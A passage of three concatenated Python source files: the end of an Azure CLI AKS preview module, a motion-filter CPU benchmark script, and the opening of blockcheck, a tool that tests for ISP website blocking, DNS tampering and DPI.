'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
for _, diag_setting in enumerate(diag_settings):
if diag_setting:
return diag_setting.storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_message_of_the_day(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
content = read_file_content(file_path)
if not content:
raise ArgumentUsageError(
"message of the day should point to a non-empty file if specified.")
content = base64.b64encode(bytes(content, 'ascii')).decode('ascii')
return content
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
cluster_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=cluster_id
)
snapshot = ManagedClusterSnapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData,
snapshot_type="ManagedCluster",
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the cluster snapshot "{}" in resource group "{}", Are you sure?'.format(
name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
def aks_nodepool_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
snapshot_name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=snapshot_name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, snapshot_name, snapshot, headers=headers)
def aks_nodepool_snapshot_show(cmd, client, resource_group_name, snapshot_name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, snapshot_name)
return snapshot
def aks_nodepool_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
snapshot_name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the nodepool snapshot "{}" in resource group "{}", Are you sure?'.format(
snapshot_name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, snapshot_name)
def aks_nodepool_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
benchmark.py
|
from motion_marmot.utils.video_utils import extract_video
from motion_marmot.advanced_motion_filter import (
AdvancedMotionFilter,
MotionMaskMetadata,
)
from datetime import datetime
import typer
import time
import threading
import os
app = typer.Typer()
contour_count = 0
frame_count = 0
def motion_detection(amf: AdvancedMotionFilter, frame, meta, config):
mask = amf.mog2_mf.apply(frame.copy())
contours = amf.calculate_contours(mask)
is_variance_activated = config.get("variance")
is_large_bg_movement_activated = config.get("large_bg_movement")
is_dynamic_bbx_activated = config.get("dynamic_bbx")
variance = 0
frame_scene = 0
dynamic_bbx_thresh = 0
if (
is_variance_activated
or is_large_bg_movement_activated
or is_dynamic_bbx_activated
):
mask_area = MotionMaskMetadata(contours)
if is_variance_activated:
variance = amf.calculate_variance(mask_area.std)
if is_large_bg_movement_activated or is_dynamic_bbx_activated:
frame_scene = amf.ssc.predict(
mask_area.avg, mask_area.std, meta["width"], meta["height"]
)
if is_dynamic_bbx_activated:
dynamic_bbx_thresh = mask_area.avg + mask_area.std
for contour in contours:
global contour_count
contour_count += 1
if amf.mog2_is_detected(
contour=contour,
scene=frame_scene,
dynamic_bbx_thresh=dynamic_bbx_thresh,
variance=variance,
history_variance=is_variance_activated,
large_bg_movement=is_large_bg_movement_activated,
dynamic_bbx=is_dynamic_bbx_activated,
):
pass
def run_motion_filter(amf, video_frames: list, video_meta, config, flag):
for frame in video_frames:
global frame_count
frame_count += 1
motion_detection(amf=amf, frame=frame, meta=video_meta, config=config)
if not flag():
break
def recur_motion_filter(flag, video, config):
video_frames, video_meta = extract_video(video)
amf = AdvancedMotionFilter(
"model/scene_knn_model",
frame_width=video_meta["width"],
frame_height=video_meta["height"],
)
print(f"Start running at: {datetime.fromtimestamp(time.time())}")
while flag():
run_motion_filter(amf, video_frames, video_meta, config, flag)
global contour_count, frame_count
print(f"Processed Contours Number: {contour_count}")
print(f"Processed Frames Number: {frame_count}")
@app.command()
def evaluate_cpu(
video: str,
interval: int,
count: int,
variance: bool = typer.Option(False),
large_bg_movement: bool = typer.Option(False),
dynamic_bbx: bool = typer.Option(False),
):
pid = os.getpid()
thread_flag = True
config = {
"variance": variance,
"large_bg_movement": large_bg_movement,
"dynamic_bbx": dynamic_bbx,
}
def flag_trigger():
return thread_flag
amf_thread = threading.Thread(
target=recur_motion_filter, args=(flag_trigger, video, config)
)
amf_thread.start()
time.sleep(5)
# run the pidstat
pidstat_command = f"pidstat -u -p {pid} {interval} {count} | tail -n 1"
pidstat_process = os.popen(pidstat_command, "r")
print(pidstat_process.read())
pidstat_process.close()
# kill thread
thread_flag = False
@app.command()
def motion_counts(
video: str,
bounding_box_threshold: int,
history_variance: bool,
variance_threshold: int,
variance_sample_amount: int,
large_bg_movement: bool,
dynamic_bbx: bool,
):
print("Extracting")
video_frames, video_meta = extract_video(video)
amf = AdvancedMotionFilter(
"model/scene_knn_model",
frame_width=video_meta["width"],
frame_height=video_meta["height"],
)
count = 0
print("Detecting")
total = len(video_frames)
i = 1
for frame in video_frames:
print(f"{int((i+1)/total*100)} %", end="\r")
mask = amf.mog2_mf.apply(frame.copy())
contours = amf.calculate_contours(mask)
mask_area = MotionMaskMetadata(contours)
frame_scene = amf.ssc.predict(
mask_area.avg, mask_area.std, video_meta["width"], video_meta["height"]
)
dynamic_bbx_thresh = mask_area.avg + mask_area.std
variance = amf.calculate_variance(mask_area.std)
for contour in contours:
if amf.mog2_is_detected(
contour=contour,
scene=frame_scene,
dynamic_bbx_thresh=dynamic_bbx_thresh,
variance=variance,
bounding_box_threshold=bounding_box_threshold,
history_variance=history_variance,
variance_threshold=variance_threshold,
variance_sample_amount=variance_sample_amount,
large_bg_movement=large_bg_movement,
dynamic_bbx=dynamic_bbx,
):
count += 1
break
i += 1
print("\n")
print(count)
@app.command()
def run():
print("dummy command")
def main():
"""Main program"""
app()
if __name__ == "__main__":
main()
|
blockcheck.py
|
#!/usr/bin/env python3
# coding: utf-8
import argparse
import json
import urllib.request
import urllib.parse
import urllib.error
import socket
import ssl
import sys
import os.path
import dns.resolver
import dns.exception
import ipaddress
import ipwhois
'''
=================================
IMPORTANT
Make sure to run this program with --no-report option
if you're editing it, debugging or testing something!
Thank you.
=================================
ВАЖНО
Запускайте программу с опцией --no-report, если
вы редактируете ее, отлаживаете или тестируете!
Спасибо.
=================================
'''
# Configuration
VERSION = "0.0.9.8"
SWHOMEPAGE = "https://github.com/ValdikSS/blockcheck"
SWUSERAGENT = "Blockcheck/" + VERSION + " " + SWHOMEPAGE
dns_records_list = (
# First server in this list should have both A and AAAA records
"rutracker.org", # Blocked by domain name.
"gelbooru.com", # Only several URLs are blocked, main page is not.
"e621.net", # Blocked by domain name. Website is HTTP only.
"danbooru.donmai.us", # Blocked by root URL.
"dailymotion.com", # Blocked by domain name.
"zello.com", # Blocked by domain name.
)
http_list = {
# Parameters:
# status: HTTP response code
# lookfor: Substring to search in HTTP reply body
# ip: IPv4 address. Used only if hostname can't be resolved using Google API.
# ipv6: IPv6 address
# subdomain: This is non-blacklisted subdomain of a blacklisted domain.
# is_blacklisted: True if website is not blacklisted and should be treated so.
'http://novostey.com': # This page should open in case of DPI, it's not blocked.
{'status': 200, 'lookfor': 'novostey', 'ip': '172.64.80.1', 'ipv6': '2606:4700:130:436c:6f75:6466:6c61:7265'},
'https://xn----stbgdeb4aai6g.xn--p1ai/': # And this should not.
{'status': 200, 'lookfor': 'PoniBooru', 'ip': '37.1.203.158'},
'http://a.putinhuylo.com/':
{'status': 200, 'lookfor': 'Antizapret', 'ip': '195.123.209.38', 'subdomain': True,
'is_blacklisted': False},
}
https_list = {'https://rutracker.org/forum/index.php', 'https://lolibooru.moe/',
'https://e621.net/', 'https://www.dailymotion.com/'}
dpi_list = {
# These tests are currently performed only using IPv4. IPv6 field is not used.
'rutracker.org':
{'host': 'rutracker.org', 'urn': '/forum/index.php',
'lookfor': 'groupcp.php"', 'ip': '195.82.146.214', 'ipv6': '2a02:4680:22::214'},
'pbooru.com':
{'host': 'pbooru.com', 'urn': '/index.php?page=post&s=view&id=304688',
'lookfor': 'Related Posts', 'ip': '104.28.10.65', 'ipv6': '2400:cb00:2048:1::681c:a41'},
}
proxy_addr = '95.137.240.30:60030'
google_dns = '8.8.4.4'
google_dns_v6 = '2001:4860:4860::8844'
fake_dns = '3.3.3.3' # Fake server which should never reply
fake_dns_v6 = '2600::10:20'
google_dns_api = 'https://dns.google.com/resolve'
isup_server = 'isitdownrightnow.com'
isup_fmt = 'https://www.isitdownrightnow.com/check.php?domain={}'
disable_isup = False # If true, presume that all sites are available
disable_report = False
disable_ipv6 = False
force_ipv6 = False
force_dpi_check = False
# End configuration
ipv6_available = False
debug = False
web_interface = False
# Something really bad happened, what most likely is a bug: system DNS
# resolver and Google DNS are unavailable, while IPv6 generally work, and so on.
# Debug log is sent to server if this variable is True.
really_bad_fuckup = False
printed_text = ''
printed_text_with_debug = ''
message_to_print = ''
try:
import tkinter as tk
import tkinter.scrolledtext as tkst
import threading
import queue
tkusable = True
if not (os.environ.get('DISPLAY') or os.environ.get('WAYLAND_DISPLAY')):
tkusable = False
class ThreadSafeConsole(tkst.ScrolledText):
def __init__(self, master, **options):
tkst.ScrolledText.__init__(self, master, **options)
self.queue = queue.Queue()
self.update_me()
def write(self, line):
self.queue.put(line)
def clear(self):
self.queue.put(None)
def update_me(self):
try:
while 1:
line = self.queue.get_nowait()
if line is None:
self.delete(1.0, tk.END)
else:
self.insert(tk.END, str(line))
self.see(tk.END)
self.update_idletasks()
except queue.Empty:
pass
self.after(100, self.update_me)
def tk_terminate():
root.destroy()
raise SystemExit
except ImportError:
tkusable = False
class ThreadSafeConsole():
pass
trans_table = str.maketrans("⚠✗✓«»", '!XV""')
def print_string(*args, **kwargs):
message = ''
newline = True
for arg in args:
message += str(arg) + " "
message = message.rstrip(" ")
for key, value in kwargs.items():
if key == 'end':
message += value
newline = False
if newline:
message += "\n"
return message
def print(*args, **kwargs):
global printed_text, printed_text_with_debug, message_to_print
if tkusable:
this_text = print_string(*args, **kwargs)
text.write(this_text)
printed_text += this_text
printed_text_with_debug += this_text
else:
if web_interface:
message_to_print += print_string(*args, **kwargs) + "<br>"
if args and sys.stdout.encoding != 'UTF-8':
args = [x.translate(trans_table).replace("[☠]", "[FAIL]").replace("[☺]", "[:)]"). \
encode(sys.stdout.encoding, 'replace').decode(sys.stdout.encoding) for x in args
]
if not web_interface:
__builtins__.print(*args, **kwargs)
this_text = print_string(*args, **kwargs)
printed_text += this_text
printed_text_with_debug += this_text
def print_debug(*args, **kwargs):
global printed_text_with_debug
this_text = print_string(*args, **kwargs)
printed_text_with_debug += this_text
if debug:
print(*args, **kwargs)
def really_bad_fuckup_happened():
global really_bad_fuckup
really_bad_fuckup = True
def _get_a_record(site, querytype='A', dnsserver=None):
